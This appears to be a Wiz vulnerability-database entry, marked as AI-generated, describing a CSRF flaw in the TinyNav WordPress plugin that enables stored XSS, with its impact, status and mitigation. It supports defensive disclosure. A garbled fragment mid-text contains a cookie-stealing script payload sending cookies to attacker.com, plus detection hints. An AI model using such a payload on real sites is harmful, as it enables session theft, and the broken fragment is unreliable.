
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-52781 is a Cross-Site Request Forgery (CSRF) vulnerability in the Beee TinyNav WordPress plugin that enables Stored Cross-Site Scripting (XSS). It affects TinyNav versions from the initial release through version 1.4 (inclusive). The vulnerability was published on June 20, 2025, and carries a CVSS v3.1 base score of 7.1 (High) (Red Hat CVE).
The vulnerability is classified under CWE-352 (Cross-Site Request Forgery), where the TinyNav plugin fails to properly validate the origin of state-changing requests, allowing an attacker to forge requests on behalf of an authenticated administrator. By exploiting the missing CSRF protection, an attacker can inject and persistently store malicious JavaScript payloads within the plugin's settings or navigation data. The attack vector is network-based, requires no privileges, but does require user interaction (i.e., tricking an authenticated user into visiting a malicious page), and the scope is changed — meaning the injected script can affect resources beyond the vulnerable component itself (Red Hat CVE).
Successful exploitation allows an attacker to persistently store malicious scripts in the WordPress site's database, which are then executed in the browsers of site visitors or administrators (Stored XSS). This can result in session hijacking, credential theft, unauthorized administrative actions, defacement, or redirection of users to malicious sites. The changed scope means the confidentiality, integrity, and availability impacts extend beyond the plugin itself to the broader WordPress environment and its users (Red Hat CVE).
There is no public evidence of active in-the-wild exploitation of CVE-2025-52781 at this time, and it has not been added to the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.015%, indicating a very low probability of exploitation in the near term. No public proof-of-concept exploit code has been identified (Red Hat CVE, CISA Bulletin).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) in a plugin input field.<script>, eval(), document.cookie) stored in WordPress database tables associated with TinyNav plugin options or navigation settings.Users should update the TinyNav plugin to a version beyond 1.4 that includes CSRF nonce validation, if a patched version has been released by the plugin author (Beee). If no patch is available, the recommended workaround is to deactivate and remove the TinyNav plugin until a fix is provided. WordPress site administrators should also ensure that only trusted users have access to the WordPress admin panel to reduce the risk of CSRF-based attacks (Red Hat CVE).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."